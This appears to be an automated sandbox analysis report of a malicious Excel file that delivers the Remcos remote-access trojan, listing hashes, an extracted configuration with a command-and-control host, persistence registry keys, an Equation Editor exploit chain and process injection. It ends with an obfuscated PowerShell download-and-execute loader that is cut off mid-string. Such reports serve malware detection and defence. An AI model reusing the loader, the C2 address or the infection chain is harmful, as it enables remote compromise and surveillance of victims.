remcos | 15feeb12f8460eebe263ec750d08dd79e1d26b2704726223f0dc7c6bacd1506d

Analysis

max time kernel
149s
max time network
146s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
16-04-2024 07:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GMB.xls
Size

317KB
MD5

cb5d55cbdd70a44948d1f976af168a59
SHA1

07d995e60e3dbdabf23690014c3a4c74aa1e2139
SHA256

15feeb12f8460eebe263ec750d08dd79e1d26b2704726223f0dc7c6bacd1506d
SHA512

5064d95029d85d8b68947176bd08a186dc18e09e24ed1eebe977710ac399cc6c3a0babfd44bd69d0a3ce14f4840f72ab01acfe0b0d87c377ab1d2cc306fb8e37
SSDEEP

6144:LuunJk9CBY35qAOJl/YrLYz+WrNhZF+E+fgL+0dD8ivSbVd1MIhFjMaZ4EX0ikpM:LvJksA3bVd1MIXMa2EEL+B

Score

10^/10

remcos remotehost persistence rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

rmcnewlistening.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-AK1F22
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 6 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exe

flow pid process

19 2040 EQNEDT32.EXE
22 3032 WScript.exe
24 1748 powershell.exe
26 1748 powershell.exe
28 1748 powershell.exe
29 1748 powershell.exe
Abuses OpenXML format to download file from external location

flow	pid	process
19	2040	EQNEDT32.EXE
22	3032	WScript.exe
24	1748	powershell.exe
26	1748	powershell.exe
28	1748	powershell.exe
29	1748	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\RVC.vbs"	powershell.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1748 set thread context of 2936 1748 powershell.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

2040 EQNEDT32.EXE

description	pid	process	target process
PID 1748 set thread context of 2936	1748	powershell.exe	RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

pid	process
2040	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXEWINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1948 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2700 powershell.exe
1748 powershell.exe
1900 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2700 powershell.exe
Token: SeDebugPrivilege 1748 powershell.exe
Token: SeDebugPrivilege 1900 powershell.exe
Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXEWINWORD.EXE

pid process

1948 EXCEL.EXE
1948 EXCEL.EXE
1948 EXCEL.EXE
2900 WINWORD.EXE
2900 WINWORD.EXE

pid	process
1948	EXCEL.EXE

pid	process
2700	powershell.exe
1748	powershell.exe
1900	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	1900	powershell.exe

pid	process
1948	EXCEL.EXE
1948	EXCEL.EXE
1948	EXCEL.EXE
2900	WINWORD.EXE
2900	WINWORD.EXE

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

EQNEDT32.EXEWINWORD.EXEWScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2040 wrote to memory of 3032	2040	EQNEDT32.EXE	WScript.exe
PID 2040 wrote to memory of 3032	2040	EQNEDT32.EXE	WScript.exe
PID 2040 wrote to memory of 3032	2040	EQNEDT32.EXE	WScript.exe
PID 2040 wrote to memory of 3032	2040	EQNEDT32.EXE	WScript.exe
PID 2900 wrote to memory of 1932	2900	WINWORD.EXE	splwow64.exe
PID 2900 wrote to memory of 1932	2900	WINWORD.EXE	splwow64.exe
PID 2900 wrote to memory of 1932	2900	WINWORD.EXE	splwow64.exe
PID 2900 wrote to memory of 1932	2900	WINWORD.EXE	splwow64.exe
PID 3032 wrote to memory of 2700	3032	WScript.exe	powershell.exe
PID 3032 wrote to memory of 2700	3032	WScript.exe	powershell.exe
PID 3032 wrote to memory of 2700	3032	WScript.exe	powershell.exe
PID 3032 wrote to memory of 2700	3032	WScript.exe	powershell.exe
PID 2700 wrote to memory of 1748	2700	powershell.exe	powershell.exe
PID 2700 wrote to memory of 1748	2700	powershell.exe	powershell.exe
PID 2700 wrote to memory of 1748	2700	powershell.exe	powershell.exe
PID 2700 wrote to memory of 1748	2700	powershell.exe	powershell.exe
PID 1748 wrote to memory of 1900	1748	powershell.exe	powershell.exe
PID 1748 wrote to memory of 1900	1748	powershell.exe	powershell.exe
PID 1748 wrote to memory of 1900	1748	powershell.exe	powershell.exe
PID 1748 wrote to memory of 1900	1748	powershell.exe	powershell.exe
PID 1748 wrote to memory of 2936	1748	powershell.exe	RegAsm.exe
PID 1748 wrote to memory of 2936	1748	powershell.exe	RegAsm.exe
PID 1748 wrote to memory of 2936	1748	powershell.exe	RegAsm.exe
PID 1748 wrote to memory of 2936	1748	powershell.exe	RegAsm.exe
PID 1748 wrote to memory of 2936	1748	powershell.exe	RegAsm.exe
PID 1748 wrote to memory of 2936	1748	powershell.exe	RegAsm.exe
PID 1748 wrote to memory of 2936	1748	powershell.exe	RegAsm.exe
PID 1748 wrote to memory of 2936	1748	powershell.exe	RegAsm.exe
PID 1748 wrote to memory of 2936	1748	powershell.exe	RegAsm.exe
PID 1748 wrote to memory of 2936	1748	powershell.exe	RegAsm.exe
PID 1748 wrote to memory of 2936	1748	powershell.exe	RegAsm.exe
PID 1748 wrote to memory of 2936	1748	powershell.exe	RegAsm.exe
PID 1748 wrote to memory of 2936	1748	powershell.exe	RegAsm.exe
PID 1748 wrote to memory of 2936	1748	powershell.exe	RegAsm.exe
PID 1748 wrote to memory of 2936	1748	powershell.exe	RegAsm.exe
PID 1748 wrote to memory of 2936	1748	powershell.exe	RegAsm.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\GMB.xls
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1948

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2900

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1932

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\loverskissingforimage.vbs"
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF